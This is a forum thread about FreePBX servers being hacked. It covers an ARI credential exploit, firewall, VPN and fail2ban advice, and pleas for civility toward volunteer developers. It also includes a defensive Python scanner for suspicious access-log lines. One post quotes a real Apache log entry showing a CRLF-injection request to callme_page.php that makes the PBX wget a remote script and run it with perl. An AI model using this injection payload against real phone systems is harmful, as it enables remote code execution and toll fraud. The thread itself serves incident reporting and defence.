I've been hacked!

My quick two cents …

First, the changesets referenced here may or may not be related to the hack, as there have been other vulnerabilities that have been introduced and since fixed, and this one has been fixed for quite some time.

Spending time attacking and criticizing vs. constructively tracking down and helping to find better solutions doesn’t really do anyone any good and, in all reality, has a very negative effect on the project. If it does anything, it hurts everyone because volunteer developers simply choose to go elsewhere vs. take the unwarranted abuse that is doled out in such exchanges.

Everyone is human and they make mistakes. It’s Open Source, and that is one of the great things about Open Source: it is viewable by everyone and thus collective minds can track things down. Reports of banks the size of Chase Manhattan being hacked are a perennial event in the news. These are institutions whose IT budgets are counted in the BILLIONS of dollars. Given that, the insulting comments being made here to members of this community are simply uncalled for. We are a community, let’s try to act that way please.

As far as the latest exploit that is likely responsible, it was published Monday, reported yesterday and fixed and published this morning. It allowed an unauthenticated user to obtain the ARI admin credentials, nothing beyond that though often those are set the same as the FreePBX Admin credentials and not changed.

@plindheimer So what’s the process for getting involved then?

I don’t have a ton of time, but I can certainly put some time into assisting. My background is in PHP, MySQL and security. I’m not claiming to be an expert in any of those areas, but I know enough to assist.

Even though it’s “open”, there needs to be some delegation and direction from the people on top for this. E.g. what’s being worked on now, what things do you want us to check for security-wise in the beta version, what’s been checked already, how do we keep track of who is working on what file at a time, and if I find a change how do I submit it and make sure it doesn’t get overwritten by another developer?

abefroman,

There are a few questions here and it also really depends on the level of involvement and time that you or anyone else might be interested in putting in.

As far as tracking what is going on, there is a timeline in trac that can show every single checkin. It’s hard to really say exactly what’s being worked on as different developers attack different areas, problems and new features based on the various motivations, though everything still ends up in the timeline.

Trying to formalize a process or some sort of automation to screen security for a project like this is tough. Generally speaking, we’ve simply relied on the Open Source nature of the project, where everything that happens is transparent and viewable by all, as one line of scrutiny. As another, there is the beta testing process and our attempts to be as reactive as possible when things come out.

Since features are rarely introduced within a finalized release, the chances of introducing such issues are much lower, though there are plenty of incidents of security issues which are not noticed until something is final. In this case, 2.10 is close to final, in release candidate state, and as such gets a lot more exposure.

The other consideration is, no matter how much emphasis is put on security, we aren’t security experts, though we are very sensitive to security. This is a PBX and it isn’t designed to be put on the web. However, we know people do, so we don’t put our heads in the sand and say ‘lalala’ when it happens. Nonetheless, it still remains that the only ‘real’ protection for security is ultimately locking down access, because there are always going to be potential issues that remain out there until reported.

If you are interested in a bigger involvement and possibly helping to lead up an effort, then the best next step is to talk with a couple of us and brainstorm what might be possible given the resources that you and others might be willing to provide. If you want to do that you can feel free to PM me and we can arrange something.

I will assume (not always a good thing) that you have some sort of firewall at the DC. You can control who can use SIP/RTP/HTTP etc. for the IP of that PBX server or for anything behind that firewall. Without a doubt, if you can VPN each location via the firewall then all phones appear to be internal and you can deny external SIP traffic from everyone except your SIP providers.

You can leave the web interface a little more open so that if you are, let’s say, visiting another office you could make a change to your PBX. You can try changing the port for the web interface of your PBX from 80 to some random unused port. To access your box from the web you would type in name.tomypbxbox.com:105038. Now, you can use a smaller port number, but basically, utilizing your firewall, you would redirect the external 105038 port to the internal port 80. I don’t think anyone will be expecting those random ports with standard scanning tools.

If you don’t have a firewall then you are making a big mistake by not protecting yourself.

In the worst case, if you don’t have a firewall you could change the default port for Apache as well; not my first choice, but effective.

Either way protect your box or someone will find a way to make free calls.

Hi Techies,

This issue happened to one of my PBXs. Without using the web GUI password the hacker managed to create/modify trunks. I have no idea how he accomplished this, but for sure there must be some bug in Apache or the FreePBX scripts.

I was using FreePBX 2.9.

This is one of the log entries from before the hacker created an admin user. He was never able to use the maint/admin password.

37.8.104.134 - - [04/Jul/2012:06:24:53 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20%20http://109.169.86.186/a/dcm7.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1129 "http://localhost/pbxm7.php?ip=my_external_ip&ext=*011" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12

I could provide more details if anyone is interested.

Regards,
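A defender-side check for access log entries of the kind quoted in the post above, added here as an example and not code from any participant in this thread or from the FreePBX project. It parses Apache combined-format log lines, flags any request whose decoded query parameters (or path) contain CR/LF characters, which is what the %0D%0A sequences in the entry above decode to, and separately flags requests to the FreePBX admin and ARI directory trees from addresses outside an allowlist. The sample log lines, the allowlisted networks and the list of admin path prefixes are all constructed assumptions for the example.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" format: client ident authuser [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed: FreePBX directory trees that only administrators should reach
# (the thread names admin, maint, meetme, panel and the ARI "recordings" portal).
ADMIN_PREFIXES = ("/admin/", "/recordings/", "/maint/", "/meetme/", "/panel/")

# Constructed allowlist of networks admin access is expected from (RFC 1918 / RFC 5737 ranges).
TRUSTED_NETS = [ip_network("192.168.0.0/16"), ip_network("198.51.100.0/24")]


def parse_line(line):
    """Split one combined-format line into fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes, so %0D%0A in the raw log becomes "\r\n" here.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def injected_crlf(params):
    """Names of query parameters whose decoded value carries a CR or LF character."""
    return [name for name, value in params if "\r" in value or "\n" in value]


def trusted(ip):
    """True when the client address falls inside one of the allowlisted networks."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def analyze(line):
    """Return the parsed fields plus a list of findings (empty when nothing looks wrong)."""
    rec = parse_line(line)
    if rec is None:
        return {"ip": None, "path": None, "findings": ["unparseable log line"]}
    findings = []
    bad = injected_crlf(rec["params"])
    if bad:
        findings.append("CR/LF in query parameter(s): " + ", ".join(bad))
    decoded_path = unquote(rec["path"])
    if "\r" in decoded_path or "\n" in decoded_path:
        findings.append("CR/LF in request path")
    if rec["path"].startswith(ADMIN_PREFIXES) and not trusted(rec["ip"]):
        findings.append("admin path %s requested from untrusted address %s" % (rec["path"], rec["ip"]))
    return {"ip": rec["ip"], "path": rec["path"], "status": rec["status"], "findings": findings}


def scan(lines):
    """Analyze every line and keep only the ones with findings."""
    return [r for r in map(analyze, lines) if r["findings"]]


# Constructed sample log lines (not real traffic): one trusted admin hit, one encoded
# CR/LF injection from outside, one plain admin page request from outside, one benign request.
SAMPLE_LOG = [
    '192.168.1.20 - - [04/Jul/2012:06:20:01 +0400] "GET /recordings/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [04/Jul/2012:06:24:53 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=100@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id HTTP/1.1" 200 1129 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [04/Jul/2012:06:25:10 +0400] "GET /admin/config.php HTTP/1.1" 401 321 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jul/2012:06:30:00 +0400] "GET /index.php?q=hello+world HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], "->", "; ".join(hit["findings"]))
```

Run against a real access_log, only the second and third sample lines above produce findings: the injection line is reported twice (CR/LF in callmenum, and an ARI path reached from an untrusted address), while the trusted-network hit and the ordinary page request pass. The CR/LF check is deliberately independent of the parameter name, so it keeps working if the same injection shape shows up in another script; the allowlist check is the cheap way to notice that an admin-only tree is being reached from the open Internet at all, which is the condition the rest of the thread says should never exist.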

I want to report one exploit. Please contact me, any authorized personnel.

My e-id rahman at india dot com

It’s a holiday in the US. Please click “report bug/feature” on the right navigation bar and provide the information.

It will be looked into immediately.

Please send me a private message with the trac ticket number assigned when you open the bug.

Thanks…Scott

While I will be one of the first to admit jumping off at the deep end and screaming about an issue which was not anyone’s fault, I would like to be the one to point out that this is a community project and it is also FREE.

I love using the system and from time to time I find an issue, I report it, I get help to fix it. I do not recall PAYING anyone for the software, help and support apart from supporting the project by using SIPStation.

My point is this, the developers, programmers, testers are not paid by us unless it is a commercial thing. The guys work hard on this to bring this fine software to us, at little to no cost to the end user. Now if it was Cisco’s Unified Communications package and something went tits up, then you have a right to be pissed, did you ever price that package?

Everyone including myself knows to keep this service behind a tight firewall, although not perfect, it keeps the noob hacker out of your server. No matter what you do, someone, somewhere will eventually get in to your server. It is up to you to make it as secure as you possibly can.

I have had attempts on my server in the past, nothing major, nothing to get alarmed about and certainly nothing to go pointing fingers about. If you can’t secure YOUR server, then maybe you should hire someone to do it for you.

A large mistake people tend to make is using the defaults for everything. Change your port numbers around, they do not have to be port 5060, and your 10000 to 20000 do not need to be opened up so far; why do you need 10000 open ports?

If you need access to your server from a remote position, use a VPN and make sure your passwords are unique, long and changed often.

I am not trying to offend anyone or stick up for anyone, but it is easy to push the blame on to someone else sometimes… I know this for a fact.

Thanks for the post, keep in mind that Cisco will not support a call manager exposed to the Internet. They won’t even open a case. If they find you have it connected to the Internet they will advise you it’s an administrative interface not designed to be connected to the Internet.

If you want to expose SIP to the Internet on CUCM they will sell you a SIP proxy license for a multi-service router. List price is $14,800

The FreePBX distro includes fail2ban. Combined with good secrets and at least some firewall protection (at a minimum enable geolocation services and only allow IPs from the country you expect your users to register from!) the SIP threat has been mitigated somewhat.

The problem now is security holes in the GUI. FreePBX is a mash up of many developers work dating back 10 years. Holes are going to be found. Within the given resources they will be patched. It appears that there might be some validity to this threat of being able to add an admin account. I am sure the team will look into it and I will bring it up Monday morning.

However, there is no need to expose FreePBX admin to the Internet. If you need to remote admin, use ssh (and change the port please) and Putty’s HTTP proxy. It allows you to tunnel through the Putty connection and access port 80 services on the remote network. You can even open up the web interface of phones reachable by the server you are ssh’d to! To make it even easier, the Firefox proxy setting is standalone. Most browsers change Windows Internet settings; Firefox does not. I leave Firefox set up for a SOCKS proxy on localhost port 8081 (same as I have my Putty default config) and then use Chrome and IE as my browsers. The only issue is if you have multiple Putty sessions, make sure you only have one set up as the SOCKS proxy or you will have issues.

Thanks again for the post.

AstroGuru,

I’m sorry that your system was hacked by this vulnerability.

This is a known vulnerability that has been fixed and updates have been available for several months now. The fixes were not only provided on the currently supported releases, but on every release prior that had this vulnerability exposed.

The vulnerable module for this issue was the fw_ari which is the user portal (ARI).

put this text in ANY of their installers and documents

Rule #7: Minimize Web Access To Your PBX. Most of the Asterisk aggregations utilize FreePBX as the graphical user interface to configure your Asterisk PBX. Because FreePBX is web-based, it is extremely dangerous to leave it exposed on the Internet. As much as we love FreePBX, keep in mind that it was written by dozens and dozens of contributors of various skill levels over a very long period of time. Spaghetti code doesn’t begin to describe some of what lies under the FreePBX covers. Make absolutely certain that you have .htaccess password protection in place for all web directories in at least these directory trees: admin, maint, meetme, and panel.

Our rule of thumb on Internet web accessibility to an Asterisk PBX goes like this. Don’t! But, if you must, build as many layers of protection as possible to assure that your system is not compromised. If the bad guys get into FreePBX, the security of your PBX has been compromised… permanently! This means you need to start over with all-new passwords by installing a fresh system. You simply cannot fix every possible hole that has been opened on a FreePBX-compromised system!